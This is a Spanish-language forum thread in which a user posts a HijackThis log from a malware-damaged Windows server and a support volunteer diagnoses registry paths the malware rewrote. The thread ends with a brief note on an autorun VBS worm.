O23 - Service: Examinador de equipos (Browser) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: HP Insight Event Notifier (CIMnotify) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\CIMntfy\cimntfy.exe (file missing)

O23 - Service: HP Smart Array SAS/SATA Event Notification Service (Cissesrv) - Hewlett-Packard Company - C:\Archivos de programa\HP\Cissesrv\Cissesrv.exe

O23 - Service: HP Insight NIC Agent (CpqNicMgmt) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\CPQNiMgt\cpqnimgt.exe (file missing)

O23 - Service: HP ProLiant Remote Monitor Service (CpqRcmc) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\CpqRcmc.exe (file missing)

O23 - Service: HP Version Control Agent (cpqvcagent) - Hewlett-Packard Company - C:\hp\hpsmh\data\cgi-bin\vcagent\vcagent.exe

O23 - Service: HP Insight Foundation Agents (CqMgHost) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\CPQMgmt\CqMgHost\cqmghost.exe (file missing)

O23 - Service: HP Insight Server Agents (CqMgServ) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\CPQMgmt\CqMgServ\cqmgserv.exe (file missing)

O23 - Service: HP Insight Storage Agents (CqMgStor) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\CPQMgmt\CqMgStor\cqmgstor.exe (file missing)

O23 - Service: Servicios de cifrado (CryptSvc) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Iniciador de procesos de servidor DCOM (DcomLaunch) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Sistema de archivos distribuido (Dfs) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\Dfssvc.exe (file missing)

O23 - Service: Cliente DHCP (Dhcp) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Servidor de DHCP (DHCPServer) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\tcpsvcs.exe (file missing)

O23 - Service: Servicio del administrador de discos lógicos (dmadmin) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\dmadmin.exe (file missing)

O23 - Service: Administrador de discos lógicos (dmserver) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)

O23 - Service: Servidor DNS (DNS) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\dns.exe (file missing)

O23 - Service: Cliente DNS (Dnscache) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Eset HTTP Server (EhttpSrv) - Unknown owner - C:\Archivos de programa\ESET\ESET NOD32 Antivirus\EHttpSrv.exe (file missing)

O23 - Service: Eset Service (ekrn) - Unknown owner - C:\Archivos de programa\ESET\ESET NOD32 Antivirus\ekrn.exe (file missing)

O23 - Service: Servicio de informe de errores (ERSvc) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)

O23 - Service: Registro de sucesos (Eventlog) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\services.exe (file missing)

O23 - Service: Ayuda y soporte técnico (helpsvc) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)

O23 - Service: Mensajería interna (IsmServ) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\ismserv.exe (file missing)

O23 - Service: Centro de distribución de claves Kerberos (kdc) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\lsass.exe (file missing)

O23 - Service: Servidor (lanmanserver) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Estación de trabajo (lanmanworkstation) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Registro de licencias (LicenseService) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\llssrv.exe (file missing)

O23 - Service: LiveUpdate - Symantec Corporation - C:\ARCHIV~1\Symantec\LIVEUP~1\LUCOMS~1.EXE

O23 - Service: Ayuda de NetBIOS sobre TCP/IP (LmHosts) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: DDE de red (NetDDE) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\netdde.exe (file missing)

O23 - Service: Inicio de sesión en red (Netlogon) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\lsass.exe (file missing)

O23 - Service: Conexiones de red (Netman) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)

O23 - Service: NLA (Network Location Awareness) (Nla) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: NOD32 Kernel Service (NOD32krn) - Unknown owner - C:\Archivos de programa\Eset\nod32krn.exe (file missing)

O23 - Service: NOD32 Remote Administration Server (NOD32RA) - Unknown owner - C:\Archivos de programa\Eset\RA\Server\nod32ra.exe (file missing)

O23 - Service: Servicio de replicación de archivos (NtFrs) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\ntfrs.exe (file missing)

O23 - Service: Proveedor de compatibilidad con seguridad LM de Windows NT (NtLmSsp) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\lsass.exe (file missing)

O23 - Service: Almacenamiento de medios extraí (NtmsSvc) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Plug and Play (PlugPlay) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\services.exe (file missing)

O23 - Service: Servicios IPSEC (PolicyAgent) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\lsass.exe (file missing)

O23 - Service: Almacenamiento protegido (ProtectedStorage) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\lsass.exe (file missing)

O23 - Service: Administrador de conexión automática de acceso remoto (RasAuto) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Administrador de conexión de acceso remoto (RasMan) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Registro remoto (RemoteRegistry) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Localizador de llamadas a procedimiento remoto (RPC) (RpcLocator) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\locator.exe (file missing)

O23 - Service: Llamada a procedimiento remoto(RPC) (RpcSs) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Conjunto resultante de proveedor de directivas (RSoPProv) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\RSoPProv.exe (file missing)

O23 - Service: Ayudante de la consola de administración especial (sacsvr) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)

O23 - Service: Administrador de cuentas de seguridad (SamSs) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\lsass.exe (file missing)

O23 - Service: Programador de tareas (Schedule) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)

O23 - Service: Inicio de sesión secundario (seclogon) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)

O23 - Service: Notificación de sucesos del sistema (SENS) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Firewall de Windows/Conexión compartida a Internet (ICS) (SharedAccess) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Detección de hardware shell (ShellHWDetection) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)

O23 - Service: Servicio SNMP (SNMP) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\snmp.exe (file missing)

O23 - Service: Servicio de captura SNMP (SNMPTRAP) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\snmptrap.exe (file missing)

O23 - Service: Cola de impresión (Spooler) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\spoolsv.exe (file missing)

O23 - Service: Administrador de informes de almacenamiento del servidor de archivos (SrmReports) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\srmhost.exe (file missing)

O23 - Service: Administrador de recursos del servidor de archivos (SrmSvc) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Microsoft Software Shadow Copy Provider (swprv) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)

O23 - Service: HP ProLiant System Shutdown Service (sysdown) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\sysdown.exe (file missing)

O23 - Service: HP System Management Homepage (SysMgmtHp) - Hewlett-Packard Company - C:\hp\hpsmh\bin\smhstart.exe

O23 - Service: Registros y alertas de rendimiento (SysmonLog) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\smlogsvc.exe (file missing)

O23 - Service: Telefonía (TapiSrv) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)

O23 - Service: Servicios de Terminal Server (TermService) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)

O23 - Service: Cliente de seguimiento de vínculos distribuidos (TrkWks) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Directorio de sesiones de Terminal Server (Tssdis) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\tssdis.exe (file missing)

O23 - Service: Sistema de alimentación ininterrumpida (UPS) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\ups.exe (file missing)

O23 - Service: Servicio de disco virtual (vds) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\vds.exe (file missing)

O23 - Service: Instantáneas de volumen (VSS) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\vssvc.exe (file missing)

O23 - Service: Horario de Windows (W32Time) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Servicio de Descubrimiento automático de proxy Web WinHTTP (WinHttpAutoProxySvc) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Instrumental de administración de Windows (winmgmt) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Servicio WINS (WINS) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\wins.exe (file missing)

O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Archivos de programa\RealVNC\VNC4\WinVNC4.exe" -service (file missing)

O23 - Service: Portable Media Serial Number Service (WmdmPmSN) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)

O23 - Service: Extensiones de controlador de Instrumental de administración de Windows (Wmi) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)

O23 - Service: Actualizaciones automáticas (wuauserv) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Configuración inalámbrica (WZCSVC) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)

O23 - Service: Servicio de aprovisionamiento de red (xmlprov) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)

brokenfred
Mensajes: 12
Registrado: 24 Sep 2007, 18:40
Ubicación: Colombia

Re: Virus daño servidor

Mensaje por brokenfred » 12 Abr 2008, 20:23

Al escanear con elistara o elitriip aparece este mensaje: "No ha sido posible abrir SYSTEM.INI"

Avatar de Usuario
msc hotline sat
Mensajes: 93500
Registrado: 09 Mar 2004, 20:39
Ubicación: BARCELONA (ESPAÑA)
Contactar:

Re: Virus daño servidor

Mensaje por msc hotline sat » 12 Abr 2008, 21:30

Pues vaya berenjenal que tienes:



Empezamos con este proceso del sistema, que normalmente se lanza desde C:\windows\system32\smss.exe y tu lo tienes desde:



C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\smss.exe



Es eso voluntario ???



y como ello, muchas claves lanzan atipicamente los procesos desde dicha ruta ??? o intentan lanzarlos, pues muchos de ellos indican (FILE MISSING), probablemente por no encontrar la aplicacion en dicha ruta, ya que normalmente deberían estar en la carpeta de sistema, c:\windows\system32\



O10 - Broken Internet access because of LSP provider 'c:\documents and settings\administrador.colcqdomp01\windows\system32\mswsock.dll' missing



O23 - Service: Servicio de búsqueda sobre experiencia con aplicaciones (AeLookupSvc) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Servicio de puerta de enlace de capa de aplicación (ALG) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\alg.exe (file missing)



O23 - Service: Administración de aplicaciones (AppMgmt) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)





O23 - Service: Servicios de cifrado (CryptSvc) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Iniciador de procesos de servidor DCOM (DcomLaunch) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Sistema de archivos distribuido (Dfs) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\Dfssvc.exe (file missing)



O23 - Service: Cliente DHCP (Dhcp) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Servidor de DHCP (DHCPServer) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\tcpsvcs.exe (file missing)



O23 - Service: Servicio del administrador de discos lógicos (dmadmin) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\dmadmin.exe (file missing)



O23 - Service: Administrador de discos lógicos (dmserver) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)



O23 - Service: Servidor DNS (DNS) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\dns.exe (file missing)



O23 - Service: Cliente DNS (Dnscache) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Servicio de informe de errores (ERSvc) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)



O23 - Service: Registro de sucesos (Eventlog) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\services.exe (file missing)



O23 - Service: Ayuda y soporte técnico (helpsvc) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)



O23 - Service: Mensajería interna (IsmServ) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\ismserv.exe (file missing)



O23 - Service: Centro de distribución de claves Kerberos (kdc) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\lsass.exe (file missing)



O23 - Service: Servidor (lanmanserver) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Estación de trabajo (lanmanworkstation) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Registro de licencias (LicenseService) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\llssrv.exe (file missing)



O23 - Service: Ayuda de NetBIOS sobre TCP/IP (LmHosts) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: DDE de red (NetDDE) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\netdde.exe (file missing)



O23 - Service: Inicio de sesión en red (Netlogon) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\lsass.exe (file missing)



O23 - Service: Conexiones de red (Netman) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)



O23 - Service: NLA (Network Location Awareness) (Nla) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Servicio de replicación de archivos (NtFrs) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\ntfrs.exe (file missing)



O23 - Service: Proveedor de compatibilidad con seguridad LM de Windows NT (NtLmSsp) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\lsass.exe (file missing)



O23 - Service: Almacenamiento de medios extraí (NtmsSvc) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Plug and Play (PlugPlay) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\services.exe (file missing)



O23 - Service: Servicios IPSEC (PolicyAgent) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\lsass.exe (file missing)



O23 - Service: Almacenamiento protegido (ProtectedStorage) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\lsass.exe (file missing)



O23 - Service: Administrador de conexión automática de acceso remoto (RasAuto) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Administrador de conexión de acceso remoto (RasMan) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Registro remoto (RemoteRegistry) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Localizador de llamadas a procedimiento remoto (RPC) (RpcLocator) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\locator.exe (file missing)



O23 - Service: Llamada a procedimiento remoto(RPC) (RpcSs) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Conjunto resultante de proveedor de directivas (RSoPProv) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\RSoPProv.exe (file missing)



O23 - Service: Ayudante de la consola de administración especial (sacsvr) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)



O23 - Service: Administrador de cuentas de seguridad (SamSs) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\lsass.exe (file missing)



O23 - Service: Programador de tareas (Schedule) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)



O23 - Service: Inicio de sesión secundario (seclogon) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)



O23 - Service: Notificación de sucesos del sistema (SENS) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Firewall de Windows/Conexión compartida a Internet (ICS) (SharedAccess) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Detección de hardware shell (ShellHWDetection) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)



O23 - Service: Servicio SNMP (SNMP) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\snmp.exe (file missing)



O23 - Service: Servicio de captura SNMP (SNMPTRAP) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\snmptrap.exe (file missing)



O23 - Service: Cola de impresión (Spooler) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\spoolsv.exe (file missing)



O23 - Service: Administrador de informes de almacenamiento del servidor de archivos (SrmReports) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\srmhost.exe (file missing)



O23 - Service: Administrador de recursos del servidor de archivos (SrmSvc) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Microsoft Software Shadow Copy Provider (swprv) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)



O23 - Service: HP ProLiant System Shutdown Service (sysdown) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\sysdown.exe (file missing)



O23 - Service: Registros y alertas de rendimiento (SysmonLog) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\smlogsvc.exe (file missing)



O23 - Service: Telefonía (TapiSrv) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)



O23 - Service: Servicios de Terminal Server (TermService) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)



O23 - Service: Cliente de seguimiento de vínculos distribuidos (TrkWks) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Directorio de sesiones de Terminal Server (Tssdis) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\tssdis.exe (file missing)



O23 - Service: Sistema de alimentación ininterrumpida (UPS) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\ups.exe (file missing)



O23 - Service: Servicio de disco virtual (vds) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\vds.exe (file missing)



O23 - Service: Instantáneas de volumen (VSS) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\vssvc.exe (file missing)



O23 - Service: Horario de Windows (W32Time) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Servicio de Descubrimiento automático de proxy Web WinHTTP (WinHttpAutoProxySvc) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Instrumental de administración de Windows (winmgmt) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Servicio WINS (WINS) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\wins.exe (file missing)



O23 - Service: Portable Media Serial Number Service (WmdmPmSN) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)



O23 - Service: Extensiones de controlador de Instrumental de administración de Windows (Wmi) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)



O23 - Service: Actualizaciones automáticas (wuauserv) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)



O23 - Service: Configuración inalámbrica (WZCSVC) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)



O23 - Service: Servicio de aprovisionamiento de red (xmlprov) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)





Sabes si esta ruta previa



[b][i]C:\Documents and Settings\administrador.COLCQDOMP01[/i][/b]



es algo conocido y particular vuestro, o es maraña impuesta por

el malware ??? Está claro el porqué no te funciona casi nada, si no encuentra los ficheros en donde tiene configurado lanzarlos...



Pero esto de COLCQDOMP01 podría ser algo de COL - Colombia ??? por esto preguntamos si lo conoceis.



Hay dos posibilidades de emergencia, copiar cada uno de los ficheros que son lanzados por dichas claves, desde [b][i]C:\windows\system32\[/i][/b] a esta otra ruta [b][i]C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\[/i][/b]



o restaurar todas las claves y eliminarles el prefijo de la ruta indicada, siempore y cuando no sea cosa voluntaria vuestra, repito !



Una manera rapida, aunque sea chapucera, es crear esta carpeta:



C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\



y en ella copiar todos los ficheros existentes en C:\windows\system32\



Con ello ver si tras reiniciar, se normaliza al menos provisionalmente. Ello es algo muy fácil de deshacer, volviendo a eliminar dichos ficheros copiados en la nueva ruta ... :wink:



Sin tocar nada mas, pruebalo y nos dices el resultado :roll:



saludos



ms, 12-04-2008

Avatar de Usuario
msc hotline sat
Mensajes: 93500
Registrado: 09 Mar 2004, 20:39
Ubicación: BARCELONA (ESPAÑA)
Contactar:

Re: Virus daño servidor

Mensaje por msc hotline sat » 12 Abr 2008, 21:39

Otra cuestion, de menor importancia, y para cuando se haya resuelto el problema gordo, es que usando NOD32 , tienes restos del Norton:



O23 - Service: LiveUpdate - Symantec Corporation - C:\ARCHIV~1\Symantec\LIVEUP~1\LUCOMS~1.EXE



Debes eliminarlos para que no ralenticen ni colisionen, recuerdalo entonces.



saludos



ms, 12-04-2008

brokenfred
Mensajes: 12
Registrado: 24 Sep 2007, 18:40
Ubicación: Colombia

Re: Virus daño servidor

Mensaje por brokenfred » 13 Abr 2008, 00:31

Definitivamente no funcionó, tuve que recurrir a un Ingeniero y esta montando de ceros el servidor, sin embargo muchas gracias y ojalá le pongan remedio a este virus, para prevenir que a otros les ocurra lo mismo.

Lo felicito por tan excelentes conocimientos.

Saludos.

Avatar de Usuario
msc hotline sat
Mensajes: 93500
Registrado: 09 Mar 2004, 20:39
Ubicación: BARCELONA (ESPAÑA)
Contactar:

Re: Virus daño servidor

Mensaje por msc hotline sat » 13 Abr 2008, 08:09

Ya vimos que el registro había sido alterado añadiendo en muchas claves el prefijo de C:\Documents and Settings\administrador.COLCQDOMP01\ en la ruta de lanzamiento, lo cual no nos ha dicho si es algo conocido de Vds, pero entendemos que no, y si aun con el apaño de copiar todos los ficheros de sistema a C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\ , para que al lanzar las claves se encontrara el fichero a lanzar, no se ha solucionado, si bien ello era solo un apaño de emergencia, y aunque era una solución rápida y cuya vuelta atrás era fácil, quizas otras cosas que hizo el virus y no se ve en el log del HJT, o que hicieron las utilidades que, sin indicarlo nosotros, probó anteriormente, impidieron el restablecimiento sin tener que partir de cero como dicen que están haciendo.



Realmente ya vimos en el script inicial, que quien ha hecho este virus ha pretendido hacer una gamberrada seria, mas que solo hacerse notar, que es lo que la mayoría de los coders pretenden lograr, notoriedad, pero este lo ha hecho con muy mala intención !



Igualmente mañana lunes monitorizaremos los ficheros enviados y, con una copia del registro de antes y despues de la infección, las compararemos y veremos las claves que elimina, las que modifica y las que crea nuevas, para restaurarlas y ofrecer la eliminacion de las alteraciones en proxima version de nuestras utilidades, de lo cual informaremos.



Lástima que no hayan podido esperar a mañana ..., pero si han decidido partir de cero, suponemos tendrán copia de seguridad de los datos y podrán reponer el servicio en marcha, a pesar del transtorno que ello significa.



Si nos necesitan de nuevo, ya saben donde estamos



Con ello damos por terminado el Tema y procedemos a cerrarlo



saludos



ms, 13.04.2008

Avatar de Usuario
msc hotline sat
Mensajes: 93500
Registrado: 09 Mar 2004, 20:39
Ubicación: BARCELONA (ESPAÑA)
Contactar:

Re: Virus daño servidor (TERMINADO)

Mensaje por msc hotline sat » 14 Abr 2008, 16:06

Notas Postcierre:



A pesar de haberse cerrado el Tema, seguimos trabajando en él, con las muestras recibidas, y resulta que además un cliente de España ha sido infectado por lo miksmo, o por lo menos por uno de los dos virus que ahora nos parece que tenía el autor de este Tema.



Aclaramos.



El *.VBS que contenía el fichero enviado, lanzado por el AUTORUN.INF correspondiente, para propagar a traves de pendrives, ya se controla con el McAfee como AUTORUN.WORM.S



